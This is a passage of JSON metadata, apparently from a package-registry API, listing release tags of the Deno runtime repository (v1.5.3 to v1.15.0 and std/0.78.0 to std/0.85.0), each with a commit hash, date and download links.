49af70dc82","kind":"commit","published_at":"2021-10-12T17:57:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.15.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.15.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.15.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.0/manifests"},{"name":"v1.14.3","sha":"1b7d6809f649318a0fb6f0e241c25885538bbe25","kind":"commit","published_at":"2021-10-04T22:03:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.14.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.14.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.14.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.3/manifests"},{"name":"v1.14.2","sha":"3ab682918a7cb9e23f8451eedb88074766d27049","kind":"commit","published_at":"2021-09-28T12:00:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.14.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.14.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.14.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.2/manifests"},{"name":"v1.14.1","sha":"f27902e749fb3a78ca35a0dc41c9fc53cd2806e1","kind":"commit","published_at":"2021-09-21T22:44:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.14.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.14.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.14.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.1/manifests"},{"name":"v1.14.0","sha":"f92cc66f0dbf8e9753f2e98d4469190f3b561eb0","kind":"commit","published_at":"2021-09-14T20:46:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.14.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.14.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.14.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.0/manifests"},{"name":"v1.13.2","sha":"7b882cc05f02e9b09e9ec2856e37730ae947f509","kind":"commit","published_at":"2021-08-23T20:58:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.13.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.13.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.13.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.2/manifests"},{"name":"v1.13.1","sha":"c67f6c13cd1de22e32f81723bc9224b8e2103a7a","kind":"commit","published_at":"2021-08-16T21:42:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.13.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.13.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.13.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.1/manifests"},{"name":"v1.13.0","sha":"d82351d67784a2bcb5431ebb233abc727f673152","kind":"commit","published_at":"2021-08-10T14:22:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.13.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.13.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.0/manifests"},{"name":"v1.12.2","sha":"dfba7a2b0197b05b3cb61724096111cc618aa747","kind":"commit","published_at":"2021-07-26T14:38:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.12.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.12.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.12.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.2/manifests"},{"name":"v1.12.1","sha":"7d69f06db88cf022f2c5c6e0b04493af7b50a98b","kind":"commit","published_at":"2021-07-19T19:09:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.12.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.12.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.12.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.1/manifests"},{"name":"v1.12.0","sha":"1ad6575028bd5a13eb0633cc5e7649e18deec556","kind":"commit","published_at":"2021-07-13T08:45:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.12.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.0/manifests"},{"name":"v1.11.5","sha":"1e57081906fd2c504c0e4895681bdc7386c1956f","kind":"commit","published_at":"2021-07-02T15:51:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.5/manifests"},{"name":"v1.11.4","sha":"ed16f4332263e81bf00a39ebc2200291b1fcbb8e","kind":"commit","published_at":"2021-07-01T11:57:51.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.4/manifests"},{"name":"v1.11.3","sha":"f4bed1081456089559c82441a13c4fb700840cac","kind":"commit","published_at":"2021-06-29T16:43:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.3/manifests"},{"name":"v1.11.2","sha":"2c0e482221cd86fdbdc055c76f1c214200419946","kind":"commit","published_at":"2021-06-21T15:47:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.2/manifests"},{"name":"v1.11.1","sha":"d7ce3adc8b97ebca61c1f527ea0f9b842d0a2dbe","kind":"commit","published_at":"2021-06-15T21:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.1/manifests"},{"name":"v1.11.0","sha":"b98293e21cb7e55def8fea2ca015381150d4cebf","kind":"commit","published_at":"2021-06-08T19:38:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.0/manifests"},{"name":"v1.10.3","sha":"1567c1013cc8ff12cf039137792da66a1d0015b5","kind":"tag","published_at":"2021-05-31T20:22:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.10.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.10.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.10.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.3/manifests"},{"name":"v1.10.2","sha":"232ec7798c5ee38e645c2aea31aea3e9a81e17f3","kind":"commit","published_at":"2021-05-17T15:28:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.10.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.10.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.10.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.2/manifests"},{"name":"v1.10.1","sha":"1cd1419e18386d512ab98849d132117182545b89","kind":"commit","published_at":"2021-05-12T03:11:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.10.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.10.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.10.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.1/manifests"},{"name":"v1.10.0","sha":"57927781ed7eb8bb088d656768dc295716407c7a","kind":"commit","published_at":"2021-05-12T00:06:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.10.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.0/manifests"},{"name":"v1.9.2","sha":"8074d8bcf3cdcc7e9a08df147e0082798a7c2760","kind":"commit","published_at":"2021-04-23T14:08:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.9.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.9.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.2/manifests"},{"name":"v1.9.1","sha":"7760d9a669552e69211b101d4656662a3dddf8dd","kind":"commit","published_at":"2021-04-20T23:46:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.9.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.1/manifests"},{"name":"v1.9.0","sha":"262ee78592209a1f8e449cfa1308dca9688a414e","kind":"commit","published_at":"2021-04-13T18:11:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.9.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.0/manifests"},{"name":"v1.8.3","sha":"2e6b78be9095cc38c392e2477711ff6eec226704","kind":"commit","published_at":"2021-04-02T10:10:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.8.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.8.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.8.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.3/manifests"},{"name":"v1.8.2","sha":"f50ed4e281e6c30120412271eb66a1fb67d1c63e","kind":"commit","published_at":"2021-03-21T20:12:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.8.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.8.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.8.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.2/manifests"},{"name":"v1.8.1","sha":"8d3baa7777b6bd2a2631e1b87a4676b520f2b447","kind":"commit","published_at":"2021-03-09T20:55:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.8.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.8.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.1/manifests"},{"name":"v1.8.0","sha":"18b894072d3eb6b04016e77ece0d78512f7ffca1","kind":"commit","published_at":"2021-03-02T23:23:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.8.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.0/manifests"},{"name":"v1.7.5","sha":"e9669bf0656c2478416f6705ff218539dc42c126","kind":"commit","published_at":"2021-02-19T14:58:34.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.5/manifests"},{"name":"v1.7.4","sha":"d2d7dc8d675d70f0061bdaf99ae4a08d84156aa9","kind":"commit","published_at":"2021-02-13T13:20:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.4/manifests"},{"name":"v1.7.3","sha":"f67b06939be5b754ecee306e9da1d7c0779c3cd6","kind":"commit","published_at":"2021-02-12T16:37:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.3/manifests"},{"name":"v1.7.2","sha":"647f11b3acc2f629a6d77836f5f6ef74ee10c4ce","kind":"commit","published_at":"2021-02-05T19:33:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.2/manifests"},{"name":"v1.7.1","sha":"11dd6f201378fe04cccadb46b7054cc2f791dda8","kind":"commit","published_at":"2021-01-29T14:53:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.1/manifests"},{"name":"std/0.85.0","sha":"11dd6f201378fe04cccadb46b7054cc2f791dda8","kind":"commit","published_at":"2021-01-29T14:53:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.85.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.85.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.85.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.85.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.85.0/manifests"},{"name":"v1.7.0","sha":"0f7a02500c0abdaae4ecfa89259c026c624773a9","kind":"commit","published_at":"2021-01-20T05:24:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.0/manifests"},{"name":"std/0.84.0","sha":"0f7a02500c0abdaae4ecfa89259c026c624773a9","kind":"commit","published_at":"2021-01-20T05:24:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.84.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.84.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.84.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.84.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.84.0/manifests"},{"name":"v1.6.3","sha":"b07a0b640d01d87c926a74d42e26a6561848c7c5","kind":"commit","published_at":"2020-12-30T15:13:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.6.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.6.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.6.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.3/manifests"},{"name":"std/0.83.0","sha":"b07a0b640d01d87c926a74d42e26a6561848c7c5","kind":"commit","published_at":"2020-12-30T15:13:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.83.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.83.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.83.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.83.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.83.0/manifests"},{"name":"v1.6.2","sha":"d199e45ad5dd180a6969abcd528023e173a1e1ff","kind":"commit","published_at":"2020-12-22T16:00:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.6.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.6.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.6.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.2/manifests"},{"name":"std/0.82.0","sha":"d199e45ad5dd180a6969abcd528023e173a1e1ff","kind":"commit","published_at":"2020-12-22T16:00:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.82.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.82.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.82.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.82.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.82.0/manifests"},{"name":"v1.6.1","sha":"b6d5ae1ecd125ce8a14cddc877cb66dbcfc9bb04","kind":"commit","published_at":"2020-12-14T20:25:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.6.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.6.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.6.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.1/manifests"},{"name":"std/0.81.0","sha":"b6d5ae1ecd125ce8a14cddc877cb66dbcfc9bb04","kind":"commit","published_at":"2020-12-14T20:25:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.81.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.81.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.81.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.81.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.81.0/manifests"},{"name":"v1.6.0","sha":"df87bf1d6a43ca36b520b45913839fd1f16df595","kind":"commit","published_at":"2020-12-08T14:37:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.6.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.0/manifests"},{"name":"std/0.80.0","sha":"df87bf1d6a43ca36b520b45913839fd1f16df595","kind":"commit","published_at":"2020-12-08T14:37:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.80.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.80.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.80.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.80.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.80.0/manifests"},{"name":"v1.5.4","sha":"bc79d556496420441977ca6f5c66be3dc3ded187","kind":"commit","published_at":"2020-11-23T14:10:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.4/manifests"},{"name":"std/0.79.0","sha":"bc79d556496420441977ca6f5c66be3dc3ded187","kind":"commit","published_at":"2020-11-23T14:10:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.79.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.79.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.79.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.79.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.79.0/manifests"},{"name":"v1.5.3","sha":"ab7b8ba8d15f37d6244784a16a3f4f3c96e38769","kind":"commit","published_at":"2020-11-16T10:14:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.3/manifests"},{"name":"std/0.78.0","sha":"ab7b8ba8d15f37d6244784a16a3f4f3c96e38769","kind":"commit","published_at":"2020-11-16T10:14:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.78.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.78.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.78.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.78.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.78.0/manifests"